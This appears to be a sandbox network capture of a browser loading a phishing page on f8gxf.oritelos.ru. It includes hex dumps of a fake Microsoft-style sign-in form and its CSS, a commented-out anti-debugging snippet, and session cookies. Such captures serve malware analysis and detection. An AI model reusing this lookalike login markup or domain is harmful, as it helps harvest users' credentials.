                                                2024-05-30 10:21:09 UTC1369INData Raw: 42 41 69 77 72 77 48 73 5a 64 43 74 4e 43 7a 69 6a 61 31 35 63 66 4e 49 4a 41 38 4a 6c 32 53 41 57 30 42 45 32 5a 42 42 72 41 68 52 4e 72 34 39 77 78 32 32 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 2c 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 2c 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 2c 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 62 31 62 31 62 3b 0d 0a 20 20 20 20 20 20 20 20 7d
                                                Data Ascii: BAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220'); background-repeat: no-repeat,no-repeat; background-position: center center,center center; background-size: cover,cover; color: #1b1b1b; }
                                                2024-05-30 10:21:09 UTC1369INData Raw: 6e 6f 77 28 29 3b 0d 0a 20 20 20 20 2f 2f 20 65 76 61 6c 28 27 64 65 62 75 67 67 65 72 27 29 3b 0d 0a 20 20 20 20 2f 2f 20 63 6f 6e 73 74 20 74 31 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 0d 0a 20 20 20 20 2f 2f 20 7d 2c 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 73 74 61 72 74 6e 65 77 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 73 65 63 74 69 6f 6e 73 22 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 73 65 63 74 69 6f 6e 5f 74 72 79 69 6e 67 74 6f 73 69 67 6e 69 6e 22 20 73 74 79 6c 65 3d 22 61 6e 69 6d 61 74 69 6f 6e 3a 73 68 6f 77 2d 66 72 6f 6d 2d 72 69 67 68 74 20 30 2e 35 73 3b 22 20 63 6c 61 73 73 3d 22 22 3e 0d
                                                Data Ascii: now(); // eval('debugger'); // const t1 = Date.now(); // }, 1000); </script></head><body class="startnew"><div id="sections" class=""> <section id="section_tryingtosignin" style="animation:show-from-right 0.5s;" class="">
                                                2024-05-30 10:21:09 UTC1369INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 72 73 74 6c 6f 67 6f 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74
                                                Data Ascii: div class="dot-floating"></div> <div class="dot-floating"></div> <div class="dot-floating"></div> </div> <div class="sectioncontent"> <div class="firstlogo"></div> <butt
                                                2024-05-30 10:21:09 UTC1369INData Raw: 32 5a 4e 67 68 41 38 75 4e 55 78 34 6e 62 56 73 49 42 35 59 45 70 74 34 35 31 33 39 22 20 77 69 64 74 68 3d 22 33 30 70 78 22 20 2f 3e 3c 2f 73 70 61 6e 3e 20 53 69 67 6e 2d 69 6e 20 6f 70 74 69 6f 6e 73 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 0d 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 73 65 63 74 69 6f 6e 5f 70 77 64 22 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 75 74 68 2d 77 72 61 70 70 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69
                                                Data Ascii: 2ZNghA8uNUx4nbVsIB5YEpt45139" width="30px" /></span> Sign-in options</p> </div> </section> <section id="section_pwd" class="d-none"> <div class="auth-wrapper"> <div class="loading-container"> <di
                                                2024-05-30 10:21:09 UTC1369INData Raw: 76 20 63 6c 61 73 73 3d 22 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 69 64 3d 22 62 74 6e 5f 73 69 67 22 3e 53 69 67 6e 20 69 6e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 0d 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 73 65 63 74 69 6f 6e 5f 79 6f 75 64 6f 6e 74 68 61 76 65 61 63 63 65 73 73 22 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 75 74 68 2d 77 72 61 70 70 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                Data Ascii: v class="bottomsection"></div> <button class="btn" id="btn_sig">Sign in</button> </div> </div> </section> <section id="section_youdonthaveaccess" class="d-none"> <div class="auth-wrapper">
                                                2024-05-30 10:21:09 UTC1369INData Raw: 20 20 20 20 20 20 20 20 3c 61 20 64 61 74 61 2d 69 64 3d 22 53 77 69 74 63 68 55 73 65 72 22 20 6f 6e 63 6c 69 63 6b 3d 22 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 77 72 61 70 22 20 68 72 65 66 3d 22 23 22 3e 53 69 67 6e 20 6f 75 74 20 61 6e 64 20 73 69 67 6e 20 69 6e 20 77 69 74 68 20 61 20 64 69 66 66 65 72 65 6e 74 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 79 6f 75 64 6f 6e 74 68 61 76 65 61 63 63 65 73 73 62 6f 74 74 6f 6d 6f 70 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 64 61 74 61 2d 69 64 3d 22 4d 6f 72 65 44 65 74 61 69 6c 73 22 20 6f
                                                Data Ascii: <a data-id="SwitchUser" onclick="linkoptionclick(this)" class="no-wrap" href="#">Sign out and sign in with a different account</a> </div> <div class="youdonthaveaccessbottomoption"> <a data-id="MoreDetails" o
                                                2024-05-30 10:21:09 UTC1369INData Raw: 62 6c 65 2e 20 3c 62 72 3e 3c 61 20 68 72 65 66 3d 22 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 6d 62 2d 31 36 22 3e 54 72 79 20 41 67 61 69 6e 2e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 77 69 74 68 6f 75 74 69 6e 74 65 72 6e 65 74 22 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 62 6f 64 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 74 20 73 65 65 6d 73 20 79 6f 75 72 20 69 6e 74 65 72 6e 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 69 73 20 75 6e 73 74 61 62 6c 65 20 61 6e 64 20 6e 6f 74 69 63 65 64 20 79 6f 75 27 72 65 20 68 61
                                                Data Ascii: ble. <br><a href="" class="link mb-16">Try Again.</a> </div> <div id="withoutinternet" class="row text-body" style="display:none;margin-bottom: 0;"> it seems your internet connection is unstable and noticed you're ha
                                                2024-05-30 10:21:09 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 73 65 72 5f 69 64 65 6e 74 69 74 79 22 3e 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 5f 63 66 5f 65 6d 61 69 6c 5f 5f 22 20 64 61 74 61 2d 63 66 65 6d 61 69 6c 3d 22 62 30 64 31 66 30 64 32 39 65 64 33 64 66 64 64 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 20 6d 62 2d 31 36 22 3e 4c 65 74 e2 80 99 73 20 74 72 79 20 73 6f 6d 65 74 68 69 6e 67 20 65 6c 73 65 3c 2f 68
                                                Data Ascii: <span class="user_identity"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b0d1f0d29ed3dfdd">[email&#160;protected]</a></span> </div> <h2 class="title mb-16">Lets try something else</h


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.449783188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC1362OUTGET /12XCRnloHGipczcdhoCq68920 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/css,*/*;q=0.1
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: style
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:10 UTC633INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:10 GMT
                                                Content-Type: text/css;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="12XCRnloHGipczcdhoCq68920"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMQ%2BavKtL0sbOMoDRgU6o9BJfmswIIIQA7Gn8o7A5u7npZ8KeN2tsnewohW7aSYXlOQjyn7enhanf6PyzoeEdC9ivUyTak4LA7jRuWijrDSKunW4Ei274NlNaqXfMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfeea7d7f5e68-EWR
                                                2024-05-30 10:21:10 UTC736INData Raw: 33 37 62 31 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                                                Data Ascii: 37b1*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
                                                2024-05-30 10:21:10 UTC1369INData Raw: 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 61 7b 63 6f 6c 6f 72
                                                Data Ascii: crosoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color
                                                2024-05-30 10:21:10 UTC1369INData Raw: 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72
                                                Data Ascii: ckground:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay:-1.1s}#sections_pdf .lds-spinner div:nth-child(2){transform:r
                                                2024-05-30 10:21:10 UTC1369INData Raw: 61 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                Data Ascii: a(0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-direction:col
                                                2024-05-30 10:21:10 UTC1369INData Raw: 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69
                                                Data Ascii: center;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}#sections_pdf .logi
                                                2024-05-30 10:21:10 UTC1369INData Raw: 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 39 29 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 62 6f 72 64 65 72 2d 72 61
                                                Data Ascii: n .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:center;background-color:rgba(0,0,0,.379);padding:15px;border-ra
                                                2024-05-30 10:21:10 UTC1369INData Raw: 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 6f 70 61 63 69 74 79 3a 30 7d 32 35 25 2c 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 33 35 25 7b 6c 65 66 74 3a 34 35 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 7d 36 35 25 7b 6c 65 66 74 3a 36 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73
                                                Data Ascii: {opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:ease-out;opacity:0}25%,75%{opacity:1}35%{left:45%;animation-timing-function:linear}65%{left:60%;animation-timing-function:eas
                                                2024-05-30 10:21:10 UTC1369INData Raw: 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 36 35 73 7d 23 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65
                                                Data Ascii: ontainer.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){animation-delay:.65s}#sections{height:100vh;width:100vw;display:table-cell;max-width:100%}#sections .sectioncontent{position:re
                                                2024-05-30 10:21:10 UTC1369INData Raw: 68 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 2e 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 23 61 75 74 68 63 61 6c 6c 64 65 73 63 7b 66 6f 6e 74 2d 73 69 7a
                                                Data Ascii: ht:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[type=email]:hover,input[type=tel]:hover{border-color:rgba(0,0,0,.8)}.input::placeholder{font-size:15px}#authcalldesc{font-siz
                                                2024-05-30 10:21:10 UTC1369INData Raw: 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 64 69 72 6c 74 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 2e 74 61 62 6c 65 2c 69 6e 70 75 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a
                                                Data Ascii: -radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radius:0}.dirltr{direction:ltr}.input-max-width{max-width:640px}.table,input{max-width:100%}label.input-group-addon{border-width:


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
